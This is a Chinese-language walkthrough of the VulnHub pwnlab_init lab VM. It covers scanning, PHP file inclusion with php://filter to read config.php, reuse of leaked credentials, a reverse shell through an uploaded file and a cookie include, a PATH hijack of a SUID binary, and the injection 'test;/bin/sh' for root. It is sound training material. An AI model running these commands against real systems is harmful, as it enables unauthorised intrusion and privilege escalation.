pwnlab_init靶场记录

N 人看过

一、环境说明

目标:得到root权限&找到flag.txt

靶场下载地址:https://www.vulnhub.com/entry/pwnlab-init,158/

靶机IP:192.168.252.134

KaliIP:192.168.252.132

二、练习记录

扫描端口。

nmap -p 1-65535 -T4 -sT 192.168.252.134
image-20230203142330799

扫描漏洞

nikto -h http://192.168.252.134
image-20230203142528250

发现敏感文件,login.php,config.php,浏览器访问发现page=login,可能存在文件包含login.php。

image-20230203142811144

尝试包含config.php文件。

http://192.168.252.134/?page=php://filter/read=convert.base64-encode/resource=config
image-20230203143355034

获取账户密码,尝试登录MYSQL数据库,获取用户账户密码,使用kent/JWzXuBJJNy成功登录web系统,发现文件上传功能。

mysql -uroot -pH4u%QJ_H99 -h 192.168.252.134
image-20230203143556444

包含upload.php,index.php两个文件,获取源码,可以看到**$_COOKIE[‘lang’]处可以通过lang参数传值包含非.php后缀的文件**,而login.php采用白名单限制,无法直接上传php文件,需要通过文件包含进行解析执行。

image-20230203144115022

使用kali自带的php反弹shell:/usr/share/webshells/php/php-reverse-shell.php,注意修改反连IP以及端口号。

└─# locate php-rever                                                         
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php

监听端口后发送请求包,包含上传的webshell,获取reverse shell。

nc -lvvp 1234
curl http://192.168.252.134 -H 'cookie:lang=../upload/364be8860e8d72b4358b5e88099a935a.png'
image-20230203144919448 image-20230203145021995

获取稳定pty终端,使用登录kane账户。

python -c 'import pty;pty.spawn("/bin/bash")'
image-20230203150059622

查找具有SUID权限的文件,发现msgmike文件,查看其文件内容,发现存在cat /home/mike/msg.txt命令执行,即其权限可能为mike用户权限,如果修改cat命令,则以kane用户权限运行的msgmike文件将调用cat,并且这个cat将以mike用户权限运行,实现提权至mike用户。

find / -perm -4000 2>/dev/null

image-20230203150746440image-20230203151012240

# 修改cat
kane@pwnlab:~$ echo "/bin/bash" > cat
# 赋予执行权限
kane@pwnlab:~$ chmod +x cat
# 修改环境变量,以达到调用本地修改后的cat命令
kane@pwnlab:~$ export PATH=/home/kane
# 还原环境变量
kane@pwnlab:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

执行后可以看到成功切换到了mike权限用户,此时需要重新把环境变量还原。

image-20230203153227587
# 切换到mike用户目录,发现msg2root文件
mike@pwnlab:~$ cd /home/mike/
# 查看文件发现存在echo命令执行
mike@pwnlab:/home/mike$ cat msg2root
# 通过分号拼接命令执行/bin/bash 获取root用户权限
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: test;/bin/sh
image-20230203154329636 image-20230203154406591

本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 (CC BY-NC-ND 4.0) 进行许可。